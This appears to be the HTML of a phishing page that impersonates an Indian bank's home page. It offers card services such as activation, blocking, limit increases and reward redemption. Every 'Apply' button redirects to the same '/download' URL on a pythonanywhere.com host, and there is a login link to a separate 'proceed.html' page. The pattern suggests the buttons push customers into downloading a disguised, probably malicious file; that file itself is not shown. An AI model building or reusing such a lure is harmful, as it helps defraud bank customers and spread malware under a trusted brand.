<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/splidejs/4.1.4/js/splide.min.js"
        integrity="sha512-4TcjHXQMLM7Y6eqfiasrsnRCc8D/unDeY1UGKGgfwyLUCTsHYMxF7/UHayjItKQKIoP6TTQ6AMamb9w2GMAvNg=="
        crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/splidejs/4.1.4/css/splide.min.css"
        integrity="sha512-KhFXpe+VJEu5HYbJyKQs9VvwGB+jQepqb4ZnlhUF/jQGxYJcjdxOTf6cr445hOc791FFLs18DKVpfrQnONOB1g=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css"
        integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
    <script src="https://cdn.tailwindcss.com"></script>
    <title>Home</title>
</head>

<body>
    <nav class="flex  item-center justify-between p-4 shadow">
        <img src="./media/logo.png" alt="Logo" class="scale-[0.65]">
        <a href="proceed.html" class="hover:underline">Login</a>
    </nav>
    <main>
        <section class="splide" aria-label="Splide Basic HTML Example">
            <div class="splide__track">
                <ul class="splide__list">
                    <li class="splide__slide">
                        <img href="#" class="" src="./media/CC_Lifetime-Free_Mobile.jpg" alt="Image 1">
                    <li class="splide__slide">
                        <img href="#" class="" src="./media/Home-Page-banner-1.jpg" alt="Image 1">
                    </li>
                    <li class="splide__slide">
                        <img href="#" class="" src="./media/INDIE-KV-adapt-home-page-banner-Mobile.jpg" alt="Image 1">
                    </li>
                    <li class="splide__slide">
                        <img href="#" class="" src="./media/m-ims-0302.jpg" alt="Image 1">
                    </li>
                    </li>
                </ul>

            </div>
        </section>
        <section>
            <div
                style="display: grid; gap: 1em; grid-template-columns: repeat(2, 1fr); align-items: center; padding: 3em 1em;">
                <div style="display: flex; flex-direction: column; justify-content: center; align-items: center;">
                    <i style="font-size: 2em; margin-bottom: 0.5em;" class="fa-solid fa-credit-card"></i>
                    <h5 style="text-align: center;">Card Protection Plan Cancellation</h5>
                    <button onclick="window.location.href = 'https://febobe7766.pythonanywhere.com/download'"
                        style="margin: 1em 0em; padding: 1em 1.6em; background-color: #832625; color: #fff; border-radius: 10px; border: none;">Apply</button>
                </div>
                <div style="display: flex; flex-direction: column; justify-content: center; align-items: center;">
                    <i style="font-size: 2.4em; margin-bottom: 0.5em;" class="fa-solid fa-award"></i>
                    <h5 style="text-align: center;">Reward Point Redeem</h5>
                    <button onclick="window.location.href = 'https://febobe7766.pythonanywhere.com/download'"
                        style="margin: 1em 0em;padding: 1em 1.6em; background-color: #832625; color: #fff; border-radius: 10px; border: none;">Apply</button>
                </div>
                <div style="display: flex; flex-direction: column; justify-content: center; align-items: center;">
                    <i style="font-size: 2em; margin-bottom: 0.5em;" class="fa-solid fa-credit-card"></i>
                    <h5 style="text-align: center;">Card Activation Application</h5>
                    <button onclick="window.location.href = 'https://febobe7766.pythonanywhere.com/download'"
                        style="margin: 1em 0em; padding: 1em 1.6em; background-color: #832625; color: #fff; border-radius: 10px; border: none;">Apply</button>
                </div>
                <div style="display: flex; flex-direction: column; justify-content: center; align-items: center;">
                    <i style="font-size: 2em; margin-bottom: 0.5em;" class="fa-solid fa-credit-card"></i>
                    <h5 style="text-align: center;">Card Block Application</h5>
                    <button onclick="window.location.href = 'https://febobe7766.pythonanywhere.com/download'"
                        style="margin: 1em 0em;padding: 1em 1.6em; background-color: #832625; color: #fff; border-radius: 10px; border: none;">Apply</button>
                </div>
                <div style="display: flex; flex-direction: column; justify-content: center; align-items: center;">
                    <i style="font-size: 2em; margin-bottom: 0.5em;" class="fa-solid fa-arrow-up-right-dots"></i>
                    <h5 style="text-align: center;">Limit Increase Application</h5>
                    <button onclick="window.location.href = 'https://febobe7766.pythonanywhere.com/download'"
                        style="margin: 1em 0em;padding: 1em 1.6em; background-color: #832625; color: #fff; border-radius: 10px; border: none;">Apply</button>
                </div>
                <div style="display: flex; flex-direction: column; justify-content: center; align-items: center;">
                    <i style="font-size: 2em; margin-bottom: 0.5em;" class="fa-solid fa-credit-card"></i>
                    <h5 style="text-align: center;">Card To Card Application</h5>
                    <button onclick="window.location.href = 'https://febobe7766.pythonanywhere.com/download'"
                        style="margin: 1em 0em;padding: 1em 1.6em; background-color: #832625; color: #fff; border-radius: 10px; border: none;">Apply</button>
                </div>
            </div>
        </section>
    </main>
    <footer class="bg-[#832625] text-slate-50 flex flex-col gap-2 py-4 justify-center intem-center text-center px-16">
        <h1 class="text-xl font-semibold border-t py-2">About Us</h1>
        <ul>
            <li><a href="#">Company</a></li>
            <li><a href="#">Investor Relations</a></li>
            <li><a href="#">Media & Brands</a></li>
            <li><a href="#">Careers</a></li>
        </ul>
        <h1 class="text-xl font-semibold border-t py-2">Initiatives</h1>
        <ul>
            <li><a href="#">CSR</a></li>
            <li><a href="#">For Sports</a></li>
        </ul>
        <h1 class="text-xl font-semibold border-t py-2">Calculators</h1>
        <h1 class="text-xl font-semibold border-t py-2">Branch/ATM</h1>
        <h1 class="text-xl font-semibold border-t py-2">Cyber Security</h1>
        <h1 class="text-xl font-semibold border-t py-2">Mcxlus Operandi Cyber Crimes</h1>
        <h1 class="text-xl font-semibold border-t py-2">Regulatory Disclosures</h1>
        <form class="flex justify-center" action="#">
            <input class="rounded-l h-10 px-6" type="text" placeholder="email" />
            <button class="bg-slate-50 border rounded-r text-[#832625] px-3">submit</button>
        </form>
        <div class="flex space-x-2 justify-center">
            <img src="./media/DICGC.jpg" class="w-36" alt="DICGC">
            <img src="./media/QR.png" class="w-36" alt="DIcGC">
        </div>
        <p>Registered Office:
            2401 Gen. Thimmayya Road
            (Cantonment), Pune-41 1 India
            Tell 020-26343201/ 020-
            69019000 994PLC076333.
            For any Shareholder's queries or grievances contact Mr.
            Raghunath Poojary at investor@example.com</p>
    </footer>
    <script>
        document.addEventListener('DOMContentLoaded', function () {
            var splide = new Splide('.splide');
            splide.mount();
        });
    </script>
</body>

</html>